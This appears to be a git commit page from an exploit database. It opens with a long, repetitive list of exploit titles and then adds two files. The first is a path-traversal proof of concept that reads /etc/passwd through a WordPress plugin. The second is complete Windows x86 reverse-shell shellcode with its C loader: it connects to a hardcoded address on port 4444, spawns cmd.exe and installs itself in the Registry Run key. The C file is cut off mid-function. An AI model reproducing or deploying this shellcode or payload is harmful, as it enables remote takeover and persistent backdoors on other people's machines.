Stack-Based Buffer Overflow TACK 1.07 - Local Stack Based Buffer Overflow Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp Multiple Field SQL Injection Authentication Bypass Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass Wireshark - iseries_parse_packet Heap-Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack-Based Buffer Overflow Wireshark - iseries_parse_packet Heap Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack-Based Buffer Overflow Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack-Based Buffer Overflow Wireshark - find_signature Stack-Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow Wireshark - getRate Stack-Based Out-of-Bounds Read Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow Wireshark - find_signature Stack Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow Wireshark - getRate Stack Based Out-of-Bounds Read Adobe Flash TextField.variable Setter - Use-After-Free Adobe Flash TextField.Variable Setter - Use-After-Free Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read eshtery CMS - 'FileManager.aspx' Local File Disclosure eshtery CMS - ' FileManager.aspx' Local File Disclosure pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - 
Heap Based Out-of-Bounds Read pdfium CPDF_Function::Call - Stack-Based Buffer Overflow pdfium CPDF_Function::Call - Stack Based Buffer Overflow MySQL 5.5.45 (64bit) - Local Credentials Disclosure pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read Tftpd32 and Tftpd64 - Denial Of Service TFTPD32 and Tftpd64 - Denial Of Service glibc - getaddrinfo Stack-Based Buffer Overflow glibc - getaddrinfo Stack Based Buffer Overflow Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow libxml2 - xmlDictAddString Heap-Based Buffer Overread libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread libxml2 - htmlCurrentChar Heap-Based Buffer Overread Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow libxml2 - xmlDictAddString Heap Based Buffer Overread libxml2 - xmlParseEndTag2 Heap Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread libxml2 - htmlCurrentChar Heap Based Buffer Overread Kamailio 4.3.4 - Heap-Based Buffer Overflow Kamailio 4.3.4 - Heap Based Buffer Overflow Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds 
Read Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow NRSS Reader 0.3.9 - Local Stack-Based Overflow NRSS Reader 0.3.9 - Local Stack Based Overflow Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap-Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer 
Overflow (MS16-097) PHP 5.0.0 - imap_mail() Local Denial of Service PHP 5.0.0 - 'imap_mail()' Local Denial of Service PHP 5.0.0 - html_doc_file() Local Denial of Service PHP 5.0.0 - 'html_doc_file()' Local Denial of Service
parent
51bcf38036
commit
479ae86249
6 changed files with 1642 additions and 771 deletions
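--- a/platforms/php/webapps/40333.txt
+++ b/platforms/php/webapps/40333.txt
@@ -0,0 +1,24 @@
+######################
+# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
+# Exploit Author : Persian Hack Team
+# Vendor Homepage : http://rbplugin.com/
+# Category [ Webapps ]
+# Tested on [ Win ]
+# Version : 2.4.7
+# Date 2016/09/03
+######################
+
+PoC
+The Vulnerable page is
+/ext/forcedownload.php
+
+http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd
+Youtube:https://youtu.be/5kE8Xt-My9A
+
+
+######################
+# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com
+# B3li3v3 M3 I will n3v3r St0p
+# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
+# Homepage : http://persian-team.ir
+######################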
607
platforms/win_x86/shellcode/40334.c
Executable file
@ -0,0 +1,607 @@
/*
|
||||
# Title : Windows x86 persistent reverse shell tcp
|
||||
# Author : Roziul Hasan Khan Shifat
|
||||
# Date : 04-09-2016
|
||||
# Tested on : Windows 7 x86
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
|
||||
|
||||
xor ecx,ecx
|
||||
mov eax,[fs:ecx+0x30] ;PEB
|
||||
mov eax,[eax+0xc] ;PEB->Ldr
|
||||
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
|
||||
lodsd
|
||||
xchg esi,eax
|
||||
lodsd
|
||||
mov ecx,[eax+0x10] ;kernel32.dll
|
||||
|
||||
|
||||
mov ebx,[ecx+0x3c] ;DOS->elf_anew
|
||||
add ebx,ecx ;PE HEADER
|
||||
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
|
||||
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
|
||||
|
||||
mov esi,[ebx+0x20] ;AddressOfNames
|
||||
add esi,ecx
|
||||
|
||||
|
||||
xor edx,edx
|
||||
|
||||
g:
|
||||
|
||||
inc edx
|
||||
lodsd
|
||||
add eax,ecx
|
||||
cmp dword [eax],'GetP'
|
||||
jne g
|
||||
cmp dword [eax+4],'rocA'
|
||||
jne g
|
||||
cmp dword [eax+8],'ddre'
|
||||
jne g
|
||||
|
||||
mov esi,[ebx+0x1c] ;AddressOfFunctions
|
||||
add esi,ecx
|
||||
|
||||
|
||||
mov edx,[esi+edx*4]
|
||||
add edx,ecx ;GetProcAddress()
|
||||
|
||||
xor eax,eax
|
||||
push eax
|
||||
|
||||
sub esp,24
|
||||
|
||||
lea esi,[esp]
|
||||
|
||||
mov [esi],dword edx ;GetProcAddress() at offset 0
|
||||
mov edi,ecx ;kernel32.dll
|
||||
|
||||
;------------------------------
|
||||
;finding address of CreateProcessA()
|
||||
|
||||
push 0x42424173
|
||||
mov [esp+2],word ax
|
||||
push 0x7365636f
|
||||
push 0x72506574
|
||||
push 0x61657243
|
||||
|
||||
lea eax,[esp]
|
||||
|
||||
push eax
|
||||
push ecx
|
||||
|
||||
call edx
|
||||
;----------------------------
|
||||
add esp,16
|
||||
|
||||
mov [esi+4],dword eax ;CreateProcessA() at offset 4
|
||||
;-----------------------------
|
||||
;finding address of ExitProcess()
|
||||
xor ecx,ecx
|
||||
push 0x41737365
|
||||
mov [esp+3],byte cl
|
||||
push 0x636f7250
|
||||
push 0x74697845
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
|
||||
add esp,12
|
||||
|
||||
mov [esi+8],dword eax ;ExitProcess() at offset 8
|
||||
;-----------------------------------------------------
|
||||
;loading ws2_32.dll
|
||||
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push 0x41797261
|
||||
push 0x7262694c
|
||||
push 0x64616f4c
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
|
||||
add esp,12
|
||||
|
||||
xor ecx,ecx
|
||||
push 0x41416c6c
|
||||
mov [esp+2],word cx
|
||||
push 0x642e3233
|
||||
push 0x5f327377
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
call eax
|
||||
add esp,8
|
||||
|
||||
mov edi,eax ;ws2_32.dll
|
||||
|
||||
;-----------------------------------
|
||||
;finding address of WSAStartup()
|
||||
xor ecx,ecx
|
||||
push 0x41417075
|
||||
mov [esp+2],word cx
|
||||
push 0x74726174
|
||||
push 0x53415357
|
||||
|
||||
lea ecx,[esp]
|
||||
push ecx
|
||||
push eax
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+12],dword eax ;WSAStartup() at offset 12
|
||||
|
||||
;------------------------------------------
|
||||
;finding address of WSASocketA()
|
||||
|
||||
xor ecx,ecx
|
||||
push 0x42424174
|
||||
mov [esp+2],word cx
|
||||
push 0x656b636f
|
||||
push 0x53415357
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+16],dword eax ;WSASocketA() at offset 16
|
||||
;-----------------------------
|
||||
;finding address of WSAConnect()
|
||||
xor ecx,ecx
|
||||
push 0x41417463
|
||||
mov [esp+2],word cx
|
||||
push 0x656e6e6f
|
||||
push 0x43415357
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
push ecx
|
||||
push edi
|
||||
|
||||
call dword [esi]
|
||||
add esp,12
|
||||
|
||||
mov [esi+20],dword eax ;WSAConnect() at offset 20
|
||||
;------------------------------------------------
|
||||
|
||||
;WSAStartup(514, &WSADATA)
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
mov cx,400
|
||||
|
||||
sub esp,ecx
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
xor ebx,ebx
|
||||
mov bx,514
|
||||
|
||||
push ecx
|
||||
push ebx
|
||||
|
||||
call dword [esi+12]
|
||||
|
||||
;-------------------------------
|
||||
|
||||
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
|
||||
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov cl,6
|
||||
push ecx
|
||||
|
||||
sub ecx,5
|
||||
push ecx
|
||||
|
||||
inc ecx
|
||||
push ecx
|
||||
|
||||
call dword [esi+16]
|
||||
|
||||
xchg edi,eax ;SOCKET
|
||||
|
||||
;--------------------------------------------------
|
||||
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov [esp],byte 2
|
||||
mov [esp+2],word 0x5c11 ;port 4444 (change it if U want)
|
||||
mov [esp+4],dword 0x81e8a8c0 ;Change it
|
||||
|
||||
connect:
|
||||
xor ecx,ecx
|
||||
lea ebx,[esp]
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
|
||||
mov cl,16
|
||||
|
||||
|
||||
push ecx
|
||||
push ebx
|
||||
push edi
|
||||
|
||||
call dword [esi+20]
|
||||
xor ecx,ecx
|
||||
|
||||
cmp eax,ecx
|
||||
jnz connect
|
||||
;----------------------------------------------
|
||||
|
||||
xor ecx,ecx
|
||||
|
||||
sub esp,16
|
||||
lea edx,[esp] ;PROCESS_INFORMATION
|
||||
|
||||
push edi
|
||||
push edi
|
||||
push edi
|
||||
push ecx
|
||||
push word cx
|
||||
push word cx
|
||||
|
||||
mov cl,255
|
||||
inc ecx
|
||||
|
||||
push ecx
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
mov cl,68
|
||||
|
||||
push ecx
|
||||
|
||||
lea ecx,[esp]
|
||||
|
||||
|
||||
xor edx,edx
|
||||
push 0x41657865
|
||||
mov [esp+3],byte dl
|
||||
push 0x2e646d63
|
||||
|
||||
lea edx,[esp]
|
||||
;-----------------------------
|
||||
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)
|
||||
|
||||
push ebx
|
||||
push ecx
|
||||
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push ecx
|
||||
|
||||
inc ecx
|
||||
push ecx
|
||||
xor ecx,ecx
|
||||
|
||||
push ecx
|
||||
push ecx
|
||||
push edx
|
||||
push ecx
|
||||
|
||||
call dword [esi+4]
|
||||
|
||||
push eax
|
||||
call dword [esi+8]
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <_start>:
|
||||
0: 31 c9 xor %ecx,%ecx
|
||||
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
|
||||
6: 8b 40 0c mov 0xc(%eax),%eax
|
||||
9: 8b 70 14 mov 0x14(%eax),%esi
|
||||
c: ad lods %ds:(%esi),%eax
|
||||
d: 96 xchg %eax,%esi
|
||||
e: ad lods %ds:(%esi),%eax
|
||||
f: 8b 48 10 mov 0x10(%eax),%ecx
|
||||
12: 8b 59 3c mov 0x3c(%ecx),%ebx
|
||||
15: 01 cb add %ecx,%ebx
|
||||
17: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
1a: 01 cb add %ecx,%ebx
|
||||
1c: 8b 73 20 mov 0x20(%ebx),%esi
|
||||
1f: 01 ce add %ecx,%esi
|
||||
21: 31 d2 xor %edx,%edx
|
||||
|
||||
00000023 <g>:
|
||||
23: 42 inc %edx
|
||||
24: ad lods %ds:(%esi),%eax
|
||||
25: 01 c8 add %ecx,%eax
|
||||
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
|
||||
2d: 75 f4 jne 23 <g>
|
||||
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
|
||||
36: 75 eb jne 23 <g>
|
||||
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
|
||||
3f: 75 e2 jne 23 <g>
|
||||
41: 8b 73 1c mov 0x1c(%ebx),%esi
|
||||
44: 01 ce add %ecx,%esi
|
||||
46: 8b 14 96 mov (%esi,%edx,4),%edx
|
||||
49: 01 ca add %ecx,%edx
|
||||
4b: 31 c0 xor %eax,%eax
|
||||
4d: 50 push %eax
|
||||
4e: 83 ec 18 sub $0x18,%esp
|
||||
51: 8d 34 24 lea (%esp),%esi
|
||||
54: 89 16 mov %edx,(%esi)
|
||||
56: 89 cf mov %ecx,%edi
|
||||
58: 68 73 41 42 42 push $0x42424173
|
||||
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
|
||||
62: 68 6f 63 65 73 push $0x7365636f
|
||||
67: 68 74 65 50 72 push $0x72506574
|
||||
6c: 68 43 72 65 61 push $0x61657243
|
||||
71: 8d 04 24 lea (%esp),%eax
|
||||
74: 50 push %eax
|
||||
75: 51 push %ecx
|
||||
76: ff d2 call *%edx
|
||||
78: 83 c4 10 add $0x10,%esp
|
||||
7b: 89 46 04 mov %eax,0x4(%esi)
|
||||
7e: 31 c9 xor %ecx,%ecx
|
||||
80: 68 65 73 73 41 push $0x41737365
|
||||
85: 88 4c 24 03 mov %cl,0x3(%esp)
|
||||
89: 68 50 72 6f 63 push $0x636f7250
|
||||
8e: 68 45 78 69 74 push $0x74697845
|
||||
93: 8d 0c 24 lea (%esp),%ecx
|
||||
96: 51 push %ecx
|
||||
97: 57 push %edi
|
||||
98: ff 16 call *(%esi)
|
||||
9a: 83 c4 0c add $0xc,%esp
|
||||
9d: 89 46 08 mov %eax,0x8(%esi)
|
||||
a0: 31 c9 xor %ecx,%ecx
|
||||
a2: 51 push %ecx
|
||||
a3: 68 61 72 79 41 push $0x41797261
|
||||
a8: 68 4c 69 62 72 push $0x7262694c
|
||||
ad: 68 4c 6f 61 64 push $0x64616f4c
|
||||
b2: 8d 0c 24 lea (%esp),%ecx
|
||||
b5: 51 push %ecx
|
||||
b6: 57 push %edi
|
||||
b7: ff 16 call *(%esi)
|
||||
b9: 83 c4 0c add $0xc,%esp
|
||||
bc: 31 c9 xor %ecx,%ecx
|
||||
be: 68 6c 6c 41 41 push $0x41416c6c
|
||||
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
c8: 68 33 32 2e 64 push $0x642e3233
|
||||
cd: 68 77 73 32 5f push $0x5f327377
|
||||
d2: 8d 0c 24 lea (%esp),%ecx
|
||||
d5: 51 push %ecx
|
||||
d6: ff d0 call *%eax
|
||||
d8: 83 c4 08 add $0x8,%esp
|
||||
db: 89 c7 mov %eax,%edi
|
||||
dd: 31 c9 xor %ecx,%ecx
|
||||
df: 68 75 70 41 41 push $0x41417075
|
||||
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
e9: 68 74 61 72 74 push $0x74726174
|
||||
ee: 68 57 53 41 53 push $0x53415357
|
||||
f3: 8d 0c 24 lea (%esp),%ecx
|
||||
f6: 51 push %ecx
|
||||
f7: 50 push %eax
|
||||
f8: ff 16 call *(%esi)
|
||||
fa: 83 c4 0c add $0xc,%esp
|
||||
fd: 89 46 0c mov %eax,0xc(%esi)
|
||||
100: 31 c9 xor %ecx,%ecx
|
||||
102: 68 74 41 42 42 push $0x42424174
|
||||
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
10c: 68 6f 63 6b 65 push $0x656b636f
|
||||
111: 68 57 53 41 53 push $0x53415357
|
||||
116: 8d 0c 24 lea (%esp),%ecx
|
||||
119: 51 push %ecx
|
||||
11a: 57 push %edi
|
||||
11b: ff 16 call *(%esi)
|
||||
11d: 83 c4 0c add $0xc,%esp
|
||||
120: 89 46 10 mov %eax,0x10(%esi)
|
||||
123: 31 c9 xor %ecx,%ecx
|
||||
125: 68 63 74 41 41 push $0x41417463
|
||||
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
|
||||
12f: 68 6f 6e 6e 65 push $0x656e6e6f
|
||||
134: 68 57 53 41 43 push $0x43415357
|
||||
139: 8d 0c 24 lea (%esp),%ecx
|
||||
13c: 51 push %ecx
|
||||
13d: 57 push %edi
|
||||
13e: ff 16 call *(%esi)
|
||||
140: 83 c4 0c add $0xc,%esp
|
||||
143: 89 46 14 mov %eax,0x14(%esi)
|
||||
146: 31 c9 xor %ecx,%ecx
|
||||
148: 51 push %ecx
|
||||
149: 66 b9 90 01 mov $0x190,%cx
|
||||
14d: 29 cc sub %ecx,%esp
|
||||
14f: 8d 0c 24 lea (%esp),%ecx
|
||||
152: 31 db xor %ebx,%ebx
|
||||
154: 66 bb 02 02 mov $0x202,%bx
|
||||
158: 51 push %ecx
|
||||
159: 53 push %ebx
|
||||
15a: ff 56 0c call *0xc(%esi)
|
||||
15d: 31 c9 xor %ecx,%ecx
|
||||
15f: 51 push %ecx
|
||||
160: 51 push %ecx
|
||||
161: 51 push %ecx
|
||||
162: b1 06 mov $0x6,%cl
|
||||
164: 51 push %ecx
|
||||
165: 83 e9 05 sub $0x5,%ecx
|
||||
168: 51 push %ecx
|
||||
169: 41 inc %ecx
|
||||
16a: 51 push %ecx
|
||||
16b: ff 56 10 call *0x10(%esi)
|
||||
16e: 97 xchg %eax,%edi
|
||||
16f: 31 c9 xor %ecx,%ecx
|
||||
171: 51 push %ecx
|
||||
172: 51 push %ecx
|
||||
173: 51 push %ecx
|
||||
174: 51 push %ecx
|
||||
175: c6 04 24 02 movb $0x2,(%esp)
|
||||
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
|
||||
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
|
||||
187: 81
|
||||
|
||||
00000188 <connect>:
|
||||
188: 31 c9 xor %ecx,%ecx
|
||||
18a: 8d 1c 24 lea (%esp),%ebx
|
||||
18d: 51 push %ecx
|
||||
18e: 51 push %ecx
|
||||
18f: 51 push %ecx
|
||||
190: 51 push %ecx
|
||||
191: b1 10 mov $0x10,%cl
|
||||
193: 51 push %ecx
|
||||
194: 53 push %ebx
|
||||
195: 57 push %edi
|
||||
196: ff 56 14 call *0x14(%esi)
|
||||
199: 31 c9 xor %ecx,%ecx
|
||||
19b: 39 c8 cmp %ecx,%eax
|
||||
19d: 75 e9 jne 188 <connect>
|
||||
19f: 31 c9 xor %ecx,%ecx
|
||||
1a1: 83 ec 10 sub $0x10,%esp
|
||||
1a4: 8d 14 24 lea (%esp),%edx
|
||||
1a7: 57 push %edi
|
||||
1a8: 57 push %edi
|
||||
1a9: 57 push %edi
|
||||
1aa: 51 push %ecx
|
||||
1ab: 66 51 push %cx
|
||||
1ad: 66 51 push %cx
|
||||
1af: b1 ff mov $0xff,%cl
|
||||
1b1: 41 inc %ecx
|
||||
1b2: 51 push %ecx
|
||||
1b3: 31 c9 xor %ecx,%ecx
|
||||
1b5: 51 push %ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 51 push %ecx
|
||||
1b8: 51 push %ecx
|
||||
1b9: 51 push %ecx
|
||||
1ba: 51 push %ecx
|
||||
1bb: 51 push %ecx
|
||||
1bc: 51 push %ecx
|
||||
1bd: 51 push %ecx
|
||||
1be: 51 push %ecx
|
||||
1bf: b1 44 mov $0x44,%cl
|
||||
1c1: 51 push %ecx
|
||||
1c2: 8d 0c 24 lea (%esp),%ecx
|
||||
1c5: 31 d2 xor %edx,%edx
|
||||
1c7: 68 65 78 65 41 push $0x41657865
|
||||
1cc: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
1d0: 68 63 6d 64 2e push $0x2e646d63
|
||||
1d5: 8d 14 24 lea (%esp),%edx
|
||||
1d8: 53 push %ebx
|
||||
1d9: 51 push %ecx
|
||||
1da: 31 c9 xor %ecx,%ecx
|
||||
1dc: 51 push %ecx
|
||||
1dd: 51 push %ecx
|
||||
1de: 51 push %ecx
|
||||
1df: 41 inc %ecx
|
||||
1e0: 51 push %ecx
|
||||
1e1: 31 c9 xor %ecx,%ecx
|
||||
1e3: 51 push %ecx
|
||||
1e4: 51 push %ecx
|
||||
1e5: 52 push %edx
|
||||
1e6: 51 push %ecx
|
||||
1e7: ff 56 04 call *0x4(%esi)
|
||||
1ea: 50 push %eax
|
||||
1eb: ff 56 08 call *0x8(%esi)
|
||||
*/
|
||||
|
||||
|
||||
#include<stdio.h>
|
||||
#include<windows.h>
|
||||
#include<string.h>
|
||||
|
||||
char shellcode[]=\
|
||||
|
||||
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";
|
||||
|
||||
int main(int li,char *a[])
|
||||
{
|
||||
char info[200];
|
||||
DWORD l;
|
||||
HKEY i;
|
||||
|
||||
|
||||
RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
|
||||
int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);
|
||||
|
||||
if(i!=0)
|
||||
{
|
||||
RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
|
||||
RegCloseKey(i);
|
||||
}
|
||||
else
|
||||
RegCloseKey(i);
|
||||
|
||||
|
||||
|
||||
|
||||
int mode;
|
||||
|
||||
|
||||
|
||||
if(li==1)
|
||||
mode=1;
|
||||
else
|
||||
mode=atoi(a[1]);
|
||||
|
||||
switch(mode)
|
||||
{
|
||||
|
||||
|
||||
|
||||
case 78:
|
||||
(* (int(*)())shellcode )();
|
||||
break;
|
||||
|
||||
case 1:
|
||||
default:
|
||||
